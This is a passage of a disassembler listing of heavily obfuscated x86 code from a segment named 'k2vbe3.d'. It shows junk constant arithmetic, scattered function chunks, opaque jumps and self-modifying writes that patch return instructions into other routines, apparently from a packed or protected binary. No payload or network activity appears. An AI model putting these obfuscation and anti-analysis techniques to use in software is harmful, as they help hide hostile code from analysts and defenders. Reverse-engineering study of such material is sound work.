loc_452E99:				; CODE XREF: sub_43C865:loc_44503Aj
		push	65C721F0h
		jmp	loc_450277
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_452EA3:				; CODE XREF: sub_45A323:loc_4478DEj
		sub	esi, 0D7D04BE1h

loc_452EA9:				; CODE XREF: sub_44B870:loc_446CFAj
		push	0EAA2BD7Ah
		pop	eax
		sub	eax, 601A222Bh
		and	eax, 665E02C3h
		or	eax, 849C93C4h
		sub	eax, 0B738A248h
		jmp	loc_453835
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_452ECC	proc near		; CODE XREF: sub_44AD77p
					; sub_452ECC:loc_44B89Dj ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D2F0 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044B89D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451CE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB13 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045BA6C SIZE 00000028 BYTES

		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		jns	loc_45AB1B
		mov	eax, [esp-4+arg_0]
		push	eax
		mov	eax, ebx

loc_452EDE:				; CODE XREF: k2vbe3.d:loc_44C8C2j
		jmp	loc_451CE0
sub_452ECC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_452EE3:				; CODE XREF: sub_44660F+11CF9j
		jl	loc_43CD49

loc_452EE9:				; CODE XREF: sub_45837E+8j
		jmp	loc_44FBD5
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------
		adc	ecx, 1F207438h
		adc	esi, eax
		and	esi, eax

loc_452EF8:				; CODE XREF: k2vbe3.d:loc_453B13j
		adc	ebx, edx
		jmp	loc_43CD49
; ---------------------------------------------------------------------------
		mov	eax, 19EDC823h
		push	eax
		push	531A62E5h
		pop	eax
		add	eax, ds:4000E8h
		jmp	loc_45AA9A
; ---------------------------------------------------------------------------
		jmp	ds:off_41E140
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_452F1C:				; CODE XREF: sub_44469A-6AB5j
		jmp	loc_441CA2
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4511F7

loc_452F21:				; CODE XREF: k2vbe3.d:loc_441E1Ej
					; sub_4511F7+7j ...
		jb	loc_451D75
		push	offset sub_44655E
		jmp	loc_451734
; END OF FUNCTION CHUNK	FOR sub_4511F7

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_452F31	proc near		; CODE XREF: sub_456666+50Cj
		retn
sub_452F31	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438F6

loc_452F32:				; CODE XREF: sub_4438F6+7j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_4438F6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_452F38:				; CODE XREF: sub_457D4B+3D5Bj
		jmp	loc_448C99
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_452F3D:				; CODE XREF: sub_44DF16+8B35j
		jmp	loc_456B77
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4CE

loc_452F42:				; CODE XREF: sub_44E4CE+3j
		jmp	loc_454657
; END OF FUNCTION CHUNK	FOR sub_44E4CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_452F47:				; CODE XREF: sub_447692-AEBDj
		jmp	loc_456536
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024C

loc_452F4C:				; CODE XREF: sub_45024C:loc_44DA70j
		mov	ds:off_41E0B4, eax
		lea	eax, sub_454BCE
		mov	byte ptr [eax],	0C3h
		jmp	loc_444892
; END OF FUNCTION CHUNK	FOR sub_45024C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BCE

loc_452F60:				; CODE XREF: sub_454BCEj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	offset sub_458899
		jmp	loc_44DC65
; END OF FUNCTION CHUNK	FOR sub_454BCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_452F6E:				; CODE XREF: sub_43EFC9+Cj
		and	eax, 4429CE68h
		xor	eax, 7C354EACh
		rol	eax, 4
		jb	loc_43F7ED

loc_452F83:				; CODE XREF: k2vbe3.d:00441D91j
		jmp	loc_44A121
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------
		xchg	esi, edi
		jmp	loc_44F80A
; ---------------------------------------------------------------------------
		pop	ecx
		jmp	sub_44A1B1
; ---------------------------------------------------------------------------
		xor	eax, esi
		jmp	loc_43FEF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_452F9C:				; CODE XREF: sub_452D37:loc_44B1FEj
		lea	eax, loc_44041F
		mov	byte ptr [eax],	0C3h
		jmp	loc_43FA85
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_452FAA:				; CODE XREF: sub_43FF90+4j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_455F6B
		mov	eax, 0C684C00Ch
		jmp	loc_458379
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_452FBD:				; CODE XREF: sub_44C90E+EFDFj
		xor	eax, 0B55027A4h
		add	eax, ebp
		push	edx
		push	0CB1A9D5Eh
		jmp	loc_4549CA
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_452FD0:				; CODE XREF: sub_4461D5+1344Fj
		cmp	eax, 1DCA9271h
		jmp	loc_44910F
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------

loc_452FDB:				; DATA XREF: sub_45226C+6o
		ror	eax, 15h
		push	ebx
		push	0C78737D9h
		pop	ebx
		sub	ebx, 512A2F3Dh
		add	ebx, 89E6F1F4h
		mov	[ebx], eax
		jmp	loc_44F241
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_452FF8:				; CODE XREF: sub_45244A:loc_442946j
					; sub_454E83:loc_455A09j
		jns	loc_45BBF2
		push	1895B073h
		mov	eax, 0F671BDFBh
		pushf
		jmp	loc_43EB28
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------

locret_45300E:				; CODE XREF: k2vbe3.d:0045C0F0j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D80

loc_45300F:				; CODE XREF: sub_458D80+16j
		jmp	loc_456BB9
; END OF FUNCTION CHUNK	FOR sub_458D80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_453014:				; CODE XREF: sub_4529E2-39E9j
		jmp	loc_443BA4
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------

loc_453019:				; CODE XREF: k2vbe3.d:0043D125j
		jmp	loc_44AC18
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_339. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45301F	proc near		; CODE XREF: k2vbe3.d:0044B2CCj
					; k2vbe3.d:loc_44E7BCj
					; DATA XREF: ...
		call	sub_446D41
sub_45301F	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45A323

loc_453024:				; CODE XREF: sub_45A323-25ACj
		mov	ebp, [edi]

loc_453026:				; CODE XREF: sub_45A323:loc_452892j
		push	offset sub_44B94B
		jmp	loc_44B898
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_453030:				; CODE XREF: sub_448A7D-3AD1j
		pop	eax

loc_453031:				; CODE XREF: sub_448A7D:loc_444F9Fj
		rol	edx, 2

loc_453034:				; CODE XREF: k2vbe3.d:loc_448C14j
		cmp	edx, 7E6A7365h
		jmp	loc_441911
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_45303F:				; CODE XREF: sub_4523BE-14C84j
		shr	eax, 1

loc_453041:				; CODE XREF: sub_4523BE:loc_43D72Cj
		rol	eax, 4
		add	eax, 1205DF8Eh
		xchg	eax, [esp+0]
		jmp	loc_44831D
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E66

loc_453052:				; CODE XREF: sub_441E66+10003j
		pop	esi
		push	esi
		pushf
		push	32717050h
		pop	esi
		or	esi, 0A246B9F2h
		add	esi, 4DCC8EDBh
		jmp	loc_45037C
; END OF FUNCTION CHUNK	FOR sub_441E66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_45306C:				; CODE XREF: sub_44D9A7:loc_449584j
					; sub_44D9A7-4414j
		add	edx, 23DDECE8h
		and	edx, 28A26E7Dh
		add	edx, 4814E195h
		add	edx, ebp
		add	edx, 97E8FC27h
		mov	[edx], eax
		jmp	loc_43F3D2
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
		mov	eax, 0EA3AEDBCh
		call	sub_451759
		push	offset sub_440F92
		jmp	loc_44CD96
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_302. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_4530A2:				; CODE XREF: sub_44D59D+6592j
		jmp	loc_43F8AE
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4530A7:				; CODE XREF: sub_43FF59+1996j
		jmp	loc_442C50
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------

loc_4530AC:				; CODE XREF: k2vbe3.d:0045058Ej
		jp	loc_44F338

; =============== S U B	R O U T	I N E =======================================



sub_4530B2	proc near		; CODE XREF: sub_4518D8+Ap

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E871 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004410D4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441F3C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B023 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		call	sub_44A7C2
		mov	eax, 99B20D50h

loc_4530C1:				; CODE XREF: k2vbe3.d:004500DAj
		push	ebx
		jmp	loc_44B023
sub_4530B2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_4530C7:				; CODE XREF: sub_44F20A+7457j
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jnz	loc_4585D4
		jmp	loc_43E130
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------

loc_4530D9:				; CODE XREF: k2vbe3.d:0043E129j
		and	esi, 9FA04BC9h

; =============== S U B	R O U T	I N E =======================================



sub_4530DF	proc near		; CODE XREF: sub_43DFE1+97F9p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D034 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004522D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004543FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459314 SIZE 00000022 BYTES

		xchg	esi, [esp+4+var_4]
		pop	esi
		push	eax
		push	0C0BE166Dh
		pop	eax
		jmp	loc_4543FC
sub_4530DF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4530EF:				; CODE XREF: sub_44C90E+8A3Bj
		sbb	esi, 54DBBD95h
		or	edx, 788607A5h
		jmp	loc_43E5D8
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_453100	proc near		; DATA XREF: sub_44B208-A3A1o

; FUNCTION CHUNK AT 00440C28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AC0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045927B SIZE 00000006 BYTES

		push	0A0F715CBh
		pop	eax
		and	eax, 59B887C6h
		xor	eax, 0F91840DFh
		cmp	eax, 8EA998BDh
		jmp	loc_45927B
sub_453100	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_45311D:				; CODE XREF: sub_44B8EF:loc_44909Aj
		and	eax, 6100DFD7h
		rol	eax, 11h
		xor	eax, 3AFA5E7h
		add	eax, 0EB3FDA16h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44ABF5
		jmp	loc_45BCE3
; END OF FUNCTION CHUNK	FOR sub_44B8EF

; =============== S U B	R O U T	I N E =======================================



sub_453141	proc near		; DATA XREF: sub_457F1C-884Do

; FUNCTION CHUNK AT 00444F24 SIZE 00000005 BYTES

		lea	eax, sub_457F1C
		mov	byte ptr [eax],	0C3h
		jmp	loc_444F24
sub_453141	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F1C

loc_45314F:				; CODE XREF: sub_457F1C+1j
		mov	eax, [esp+0]
		call	sub_45485B
; END OF FUNCTION CHUNK	FOR sub_457F1C
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_453157:				; CODE XREF: sub_4541D3+9j
		jmp	loc_442DC0
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458951

loc_45315C:				; CODE XREF: sub_458951-13A63j
		jmp	loc_458239
; END OF FUNCTION CHUNK	FOR sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_453161:				; CODE XREF: sub_45A9B3-1B958j
		jmp	loc_43EE23
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_453166:				; CODE XREF: sub_4424CF:loc_44CFCCj
		mov	edx, 0A2CD59D9h
		call	sub_4432B0
		mov	ds:dword_445628, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		call	sub_4436CE
		mov	edx, 0A22F8A70h
		call	sub_4432B0
		jmp	loc_447833
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_45318A:				; CODE XREF: sub_44945C+Dj
		or	eax, eax
		jnz	loc_4586A9
		jmp	loc_44DE8E
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_453197:				; CODE XREF: sub_44921C+E7D5j
		jno	loc_43CBB6

loc_45319D:				; CODE XREF: sub_44921C:loc_44E81Cj
		call	nullsub_5
		retn
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_4531A3:				; CODE XREF: sub_440D7B+13781j
		jmp	loc_440758
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------

loc_4531A8:				; CODE XREF: k2vbe3.d:00440F16j
		jmp	loc_43C765
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_348. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4531AE:				; CODE XREF: k2vbe3.d:0044998Fj
		jmp	loc_4526D2
; ---------------------------------------------------------------------------

loc_4531B3:				; CODE XREF: k2vbe3.d:0043F65Fj
		jmp	loc_43C71D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4531B8:				; CODE XREF: sub_440CEA:loc_4575F4j
		call	sub_43C04E
		test	al, al
		jmp	loc_4502A4
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4531C4:				; CODE XREF: sub_45A323:loc_44869Ej
		pop	eax
		rol	eax, 1
		xor	eax, 0E92A12C7h
		add	eax, 1021C1D9h
		mov	[ebp-0Ch], eax
		xor	eax, eax
		push	edi
		push	3F46A297h
		jmp	loc_45B417
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_4531E3:				; CODE XREF: k2vbe3.d:loc_447988j
		push	0A08D019Fh
		pop	esi
		or	esi, 7A0A9568h
		add	esi, 0E9501C44h
		xor	esi, 7F668291h
		jmp	loc_451836
; ---------------------------------------------------------------------------

loc_453200:				; CODE XREF: k2vbe3.d:loc_458BE8j
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_43E135
		mov	eax, 0D4280129h
		push	offset sub_4412B5
		jmp	loc_44DCE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_45321A:				; CODE XREF: sub_45A9B3:loc_454A07j
		jge	loc_4589B0
		jmp	loc_450448
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448343

loc_453225:				; CODE XREF: sub_448343:loc_44A6F8j
		mov	ebp, esi
		adc	esi, 8172523Dh

loc_45322D:				; CODE XREF: k2vbe3.d:0043F0B4j
		jmp	loc_4526E5
; END OF FUNCTION CHUNK	FOR sub_448343
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_453232:				; CODE XREF: sub_446E24+CF4Dj
		jnp	loc_4522D9

loc_453238:				; CODE XREF: sub_446E24:loc_454C78j
		lea	eax, [ebp-26Fh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_4574D5
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
		and	esi, eax
		jmp	sub_44E542
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_453257:				; CODE XREF: sub_4536DC-299Aj
		jmp	loc_453E2E
; END OF FUNCTION CHUNK	FOR sub_4536DC

; =============== S U B	R O U T	I N E =======================================



sub_45325C	proc near		; CODE XREF: sub_44B3C0-38ADj
					; sub_43E360+AE06p

; FUNCTION CHUNK AT 0044ED08 SIZE 00000014 BYTES

		call	sub_452CF7

loc_453261:				; CODE XREF: sub_43DA0B+3152j
		jmp	loc_44ED08
sub_45325C	endp

; ---------------------------------------------------------------------------

loc_453266:				; CODE XREF: k2vbe3.d:004412FAj
		jo	loc_459F9C
		add	edx, 2AC10256h
		jmp	loc_4501D8
; ---------------------------------------------------------------------------

loc_453277:				; CODE XREF: k2vbe3.d:00446A7Ej
					; k2vbe3.d:loc_450B7Cj
		sbb	esi, eax
		jmp	loc_448ADC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_45327E:				; CODE XREF: sub_43DEBE+6j
		mov	eax, ds:dword_453E90
		or	eax, eax
		jnz	loc_4500A2
		jmp	loc_4460A1
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452DD6

loc_453291:				; CODE XREF: sub_452DD6+Ej
		add	eax, ebx
		pop	ebx
		pushf
		push	ecx
		jmp	loc_459D19
; END OF FUNCTION CHUNK	FOR sub_452DD6

; =============== S U B	R O U T	I N E =======================================



sub_45329B	proc near		; CODE XREF: sub_44BECA-93D0p
					; k2vbe3.d:004483EAj
		xchg	edi, [esp+0]
		pop	edi
		lea	eax, sub_44B39A
		mov	byte ptr [eax],	0C3h
		jmp	sub_44B39A
sub_45329B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4532AD	proc near		; CODE XREF: sub_40F60F+8Cp
					; sub_4532AD:loc_454BC3j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00445050 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454BC3 SIZE 00000006 BYTES

		call	sub_454BCE
		jmp	loc_445050
sub_4532AD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_4532B7:				; CODE XREF: sub_443BDF:loc_448F73j
		jge	loc_4472F1
		cmp	eax, 55819C15h
		jmp	loc_443D9C
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4532C8:				; CODE XREF: sub_450F71-EB01j
		add	esi, ecx
		pop	eax

loc_4532CB:				; CODE XREF: k2vbe3.d:loc_45AC25j
		lea	eax, [ebp-14h]
		push	ebx
		jmp	loc_457302
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		push	ebx
		push	0B72A3814h
		pop	ebx
		rol	ebx, 14h
		add	ebx, 7EF66E1Dh
		mov	[ebx], eax
		jmp	loc_44695F
; ---------------------------------------------------------------------------

loc_4532EB:				; CODE XREF: k2vbe3.d:0045B9E1j
		jb	loc_4439C4
		add	ecx, ebp
		jmp	loc_43CADC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_4532F8:				; CODE XREF: sub_4460FD:loc_44D8F6j
		jz	loc_447BFD
		cdq
		rol	ebx, 16h
		jmp	loc_446C46
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_453307:				; CODE XREF: sub_451EB7-4E6Bj
		cmp	edx, 0FD04A515h
		jmp	loc_45B1A7
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_453312:				; CODE XREF: sub_458DAF:loc_4445DDj
		xchg	ecx, [esi]
		popf
		jmp	loc_458BBF
; END OF FUNCTION CHUNK	FOR sub_458DAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456706

loc_45331A:				; CODE XREF: sub_456706:loc_44960Cj
		pop	ebp
		xor	edi, 6FD0537Dh
		rol	edi, 1Fh
		xor	edi, 3EA443F3h
		jmp	loc_446A23
; END OF FUNCTION CHUNK	FOR sub_456706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_45332F:				; CODE XREF: sub_44083C+BB80j
		jz	loc_44C8C8
; END OF FUNCTION CHUNK	FOR sub_44083C
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_453335:				; CODE XREF: sub_44C90E-563Aj
		jmp	loc_454366
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		shr	ecx, 3
		xor	ecx, ebx
		cmp	esi, edx
		jmp	loc_45793B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_453347	proc near		; CODE XREF: k2vbe3.d:0044097Dp
					; sub_44111E+4p ...

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043F06E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443140 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444056 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0044612C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004495F7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044B756 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D61D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DD80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F9E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453ECC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458689 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A928 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045AADB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B46C SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		call	sub_44F20A

loc_45334F:				; DATA XREF: sub_4497D1+5467o
		push	1DEA9BB6h
		pop	edx
		sub	edx, 0CA4617D0h
		rol	edx, 11h
		sub	edx, 940DC957h
		jns	loc_44B756

loc_45336A:				; CODE XREF: k2vbe3.d:00442089j
		jmp	loc_444056
sub_453347	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D786

loc_45336F:				; CODE XREF: sub_43D786+19j
		jmp	loc_4536FB
; END OF FUNCTION CHUNK	FOR sub_43D786
; ---------------------------------------------------------------------------
		jle	loc_44D4CA
		adc	ebp, 0F76303CEh
		jmp	loc_44B756
; ---------------------------------------------------------------------------

loc_453385:				; DATA XREF: sub_44083C:loc_43E083o
		sub	al, 99h
		push	3C40BA07h
		xchg	ecx, [esp]
		mov	edx, ecx
		jmp	loc_44ECB0
; ---------------------------------------------------------------------------

loc_453396:				; CODE XREF: k2vbe3.d:0044CEFFj
		jbe	loc_4538E4
		mov	[eax], ebp
		and	edi, 8FEEB762h
		xor	ebx, edi

loc_4533A6:				; CODE XREF: k2vbe3.d:0044CEEEj
		rol	edx, 5
		test	edx, 80000h
		jmp	loc_459643
; ---------------------------------------------------------------------------

loc_4533B4:				; CODE XREF: k2vbe3.d:loc_4587D4j
		push	2CC39720h
		pop	eax
		or	eax, 0F523CAB8h
		xor	eax, 8099C0C4h
		rol	eax, 15h
		add	eax, 79C54E2Bh
		add	eax, ebp
		jmp	loc_447C31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D887

loc_4533D6:				; CODE XREF: sub_44D887+E14Fj
		xchg	edi, [esp+4+var_4]
		jmp	loc_44C85D
; END OF FUNCTION CHUNK	FOR sub_44D887
; ---------------------------------------------------------------------------
		push	2586CA3Eh
		pop	eax
		add	eax, 0CF84A443h
		xor	eax, 74D4C3CFh
		or	eax, 85D117BEh
		xor	eax, 5414B0A8h
		push	edx
		jmp	loc_44AB17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_453402:				; CODE XREF: sub_43D023+9B3Cj
		jz	loc_44266B
		jmp	loc_4501FF
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------

loc_45340D:				; CODE XREF: k2vbe3.d:004403C8j
		jnp	nullsub_67
		cmp	eax, esi
		jmp	loc_44AF4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_45341A:				; CODE XREF: sub_45000F:loc_451643j
		pop	eax
		xor	eax, 0F7E1789Fh
		add	eax, 8BF087FAh
		sub	eax, 8D17E173h
		and	eax, 56959349h
		push	offset sub_4467A1
		jmp	nullsub_349
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45649E

loc_45343D:				; CODE XREF: sub_45649E:loc_43C893j
		pop	edx
		mov	eax, [esp-4+arg_0]

loc_453441:				; CODE XREF: sub_45A323:loc_45ABD4j
		push	ebp
		mov	ebp, edi
		xchg	ebp, [esp+0]
		jmp	loc_43C524
; END OF FUNCTION CHUNK	FOR sub_45649E
; ---------------------------------------------------------------------------

loc_45344C:				; CODE XREF: k2vbe3.d:0043C019j
		xchg	ebp, eax
		adc	ebp, ecx
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_453450:				; CODE XREF: sub_43CCD0:loc_43C00Cj
		and	esi, 0BD8E5B35h
		xor	esi, 5120189Bh
		add	esi, ebp
		push	ecx
		push	7B49771Fh
		sbb	ecx, edi
		jmp	loc_44DC74
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_45346B	proc near		; CODE XREF: sub_4424CF+49BDp
					; k2vbe3.d:004518B4j

; FUNCTION CHUNK AT 0043CEA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DB7 SIZE 00000016 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0ED182D45h
		pop	ebx
		and	ebx, 5B55F740h
		jmp	loc_43CEA0
sub_45346B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508C5

loc_453480:				; CODE XREF: sub_4508C5+15j
		or	edi, 4A3E0ACEh
		and	edi, 0CBEAA83Fh
		test	edi, 4000000h
		jmp	loc_458ABE
; END OF FUNCTION CHUNK	FOR sub_4508C5
; ---------------------------------------------------------------------------

loc_453497:				; CODE XREF: k2vbe3.d:loc_4511B1j
		jz	loc_446E75
		jmp	loc_44122C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_4534A2:				; CODE XREF: sub_43F34C+1B4BAj
		jbe	loc_449A2D
		shl	edx, 0Bh

